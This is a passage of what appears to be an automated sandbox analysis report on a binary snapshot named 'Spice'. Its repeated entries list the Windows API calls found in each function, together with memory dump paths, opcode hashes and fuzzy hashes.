                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 780911581-0
                                                                                                                                                                                                                                      • Opcode ID: 7275d3d7a7e9f6ac811e58a0da5e1866815b3499eda6891d330ad612c3790dfe
                                                                                                                                                                                                                                      • Instruction ID: 9eb029d8e7915a14b43050169ffb7e716612a4ebae8b38ffd696ba049836e668
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7275d3d7a7e9f6ac811e58a0da5e1866815b3499eda6891d330ad612c3790dfe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49A15675604B459FC710DF55C581B2AB7E5BF88314F049859FA9AAB3A2DB30ED00CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F03C4C,?), ref: 00EC8308
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F03C4C,?), ref: 00EC8320
                                                                                                                                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,00F00988,000000FF,?,00000000,00000800,00000000,?,00F03C4C,?), ref: 00EC8345
                                                                                                                                                                                                                                      • _memcmp.LIBCMT ref: 00EC8366
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 314563124-0
                                                                                                                                                                                                                                      • Opcode ID: 82bd0c5eb7f335567dda9328b5f66e51bcb3eba127eab462614ba129b6cc00e6
                                                                                                                                                                                                                                      • Instruction ID: 34e9bdaabc2950402e9e60fdab010c55521af2712ff6dcfacd56cfb91a1aa801
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82bd0c5eb7f335567dda9328b5f66e51bcb3eba127eab462614ba129b6cc00e6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF812D71A00109EFCB04DF94CA88EEEB7B9FF89315F144559E505BB250DB71AE06CB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2808897238-0
                                                                                                                                                                                                                                      • Opcode ID: 630a8f8f7b1b8f651fdffef57a0757cb3b2c0c3d7dbcc89573a1a80e25742b9f
                                                                                                                                                                                                                                      • Instruction ID: 8ac332929b480d4d6f68616aa48fea8a82d441d938dbcaf2e7f09441173c3471
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 630a8f8f7b1b8f651fdffef57a0757cb3b2c0c3d7dbcc89573a1a80e25742b9f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E651C630608B019BCB209F79D995F6DB7E4AF44314F20B81FE5D6E72A1EB7298428F05
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00EEF526
                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00EEF534
                                                                                                                                                                                                                                        • Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77
                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00EEF5F4
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00EEF603
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2576544623-0
                                                                                                                                                                                                                                      • Opcode ID: 90253e416b91c8cb8464475aac20652fad7706eb4cb4734052ec12486af62ec2
                                                                                                                                                                                                                                      • Instruction ID: 9b619b40713f583a76b892d7cc9e367a27019a26302fbc3c79b58fd26b7b1a5a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90253e416b91c8cb8464475aac20652fad7706eb4cb4734052ec12486af62ec2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD519FB11043559FD320EF24DC81E6BB7E8EF94700F10592DF599E72A2EB70A905CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2782032738-0
                                                                                                                                                                                                                                      • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                                                                                                                                                                                      • Instruction ID: e162fea597933abdcd832b5cbbc0f0b194a6c8fa802285d4f195cc22fe2c4c37
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C41D6B170070A9BDF288E69C880DAF77A5AF81364B24917DE855A76D0F770DE428B44
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00ECA68A
                                                                                                                                                                                                                                      • __itow.LIBCMT ref: 00ECA6BB
                                                                                                                                                                                                                                        • Part of subcall function 00ECA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00ECA976
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00ECA724
                                                                                                                                                                                                                                      • __itow.LIBCMT ref: 00ECA77B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$__itow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3379773720-0
                                                                                                                                                                                                                                      • Opcode ID: 55e3f69ab311cb7b846fa1cfa9d821d3a1fa752a8e3caf27f49390b3f201ad3b
                                                                                                                                                                                                                                      • Instruction ID: a94f710372a6d7dd91b34ae59441df2680c5d12c5a82e06713731632a27d3977
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55e3f69ab311cb7b846fa1cfa9d821d3a1fa752a8e3caf27f49390b3f201ad3b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF416E74A0020CABDF11EF54C946FEE7BB9AF44754F08106DF909B3291DB719946CBA2
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00EE70BC
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00EE70CC
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC
                                                                                                                                                                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00EE7130
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00EE713C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2214342067-0
                                                                                                                                                                                                                                      • Opcode ID: 2387b1debe6168816e4b0fd14eaab1687eb1ac64fd6b0c73ce0876801d616994
                                                                                                                                                                                                                                      • Instruction ID: c7e343bae882948501d035af424fcb78643ae0ec1f24cf81146ef1d7545cb3af
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2387b1debe6168816e4b0fd14eaab1687eb1ac64fd6b0c73ce0876801d616994
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3941BFB1740204AFEB24AF24DC86F3A77E4EB04B14F04D458FA99AB3D2DB709C018B91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00F00980), ref: 00EE6B92
                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 00EE6BC4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _strlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4218353326-0
                                                                                                                                                                                                                                      • Opcode ID: 867827e72ed67c6964e9fac7040d101ef5bb782e834dc939525611a4cd111c81
                                                                                                                                                                                                                                      • Instruction ID: 5ffa5d34edd06571211f73d72cd8a1aa4e717e63eb3571673e20494c671171f1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 867827e72ed67c6964e9fac7040d101ef5bb782e834dc939525611a4cd111c81
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E41B071600108ABCB04FB65DD81EAEB3E9EF64350F149155F91AB7292DB30AD01CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EF8F03
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InvalidateRect
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 634782764-0
                                                                                                                                                                                                                                      • Opcode ID: c1f9d09e21547c27be687e0e5286fbeddec664d643a2edfef0cbd441c9588f46
                                                                                                                                                                                                                                      • Instruction ID: 548f4fc69efc65fd1f04c87dc56d80f64e57c44e64336fa0e342c89f0c9fb670
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1f9d09e21547c27be687e0e5286fbeddec664d643a2edfef0cbd441c9588f46
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6631EF3270420CAFEF249A18CE49BBC37A6EB05324F246502FB55F61A0DF71EA50DA51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 00EFB1D2
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EFB248
                                                                                                                                                                                                                                      • PtInRect.USER32(?,?,00EFC6BC), ref: 00EFB258
                                                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00EFB2C9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1352109105-0
                                                                                                                                                                                                                                      • Opcode ID: 7f084f80dcfcbd73a88d8197f9c85664b77cf9565281c77d29a9c7593ae2d1f1
                                                                                                                                                                                                                                      • Instruction ID: bb32e544a138d1d77c26b38ab51f70fbc81f896f5b42c0334a5ee2db5381b59b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f084f80dcfcbd73a88d8197f9c85664b77cf9565281c77d29a9c7593ae2d1f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76417F70A0421DDFEB21DF58C884BAD77F5FF49314F1495A5EA18AB261D730A841DB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00ED1326
                                                                                                                                                                                                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00ED1342
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00ED13A8
                                                                                                                                                                                                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00ED13FA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                                                                                      • Opcode ID: 06b31a6a4561e911a406120ee8869853bde1b96904b9fcd09df23da9e532c788
                                                                                                                                                                                                                                      • Instruction ID: 7ba85244c21d45ebf479bbb62c6f0885c46b974763f596b60f4d31fa232d348e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06b31a6a4561e911a406120ee8869853bde1b96904b9fcd09df23da9e532c788
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D313770E40208BEFB348A658C05BFE7BAAEB44324F08629BE490727D1D7758D539B51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00ED1465
                                                                                                                                                                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00ED1481
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00ED14E0
                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00ED1532
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                                                                                      • Opcode ID: 5d61df86b1a3f5a0f73201472b7bb2381ccca289eb3bb040f21b76083fe513d3
                                                                                                                                                                                                                                      • Instruction ID: 2be9afc1da95c6f2a8c426373f2b3a776fb029c01be00e866369f97b3f72018d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d61df86b1a3f5a0f73201472b7bb2381ccca289eb3bb040f21b76083fe513d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF316E30E402187EFF348A659C04BFEBBA5EB85314F08639BE4A1723D1C77889539B61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EA642B
                                                                                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 00EA6459
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EA6487
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EA64BD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                                                                                      • Opcode ID: c5c4721aa5c143fa3c1bceb62f3f5d787ecf05356e1e93ec92386d2a4918c4e7
                                                                                                                                                                                                                                      • Instruction ID: 9c08e5e878317b8a839700a4ea376b5248893c0384bbfc5a71b09135c3b8f48a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5c4721aa5c143fa3c1bceb62f3f5d787ecf05356e1e93ec92386d2a4918c4e7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6431A131604256AFDB218F75CC44BAA7BB5FF4B314F195029E874AB1A1DB31F850D750
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00EF553F
                                                                                                                                                                                                                                        • Part of subcall function 00ED3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00ED3B4E
                                                                                                                                                                                                                                        • Part of subcall function 00ED3B34: GetCurrentThreadId.KERNEL32 ref: 00ED3B55
                                                                                                                                                                                                                                        • Part of subcall function 00ED3B34: AttachThreadInput.USER32(00000000,?,00ED55C0), ref: 00ED3B5C
                                                                                                                                                                                                                                      • GetCaretPos.USER32(?), ref: 00EF5550
                                                                                                                                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 00EF558B
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00EF5591
                                                                                                                                                                                                                                      Memory Dump Source
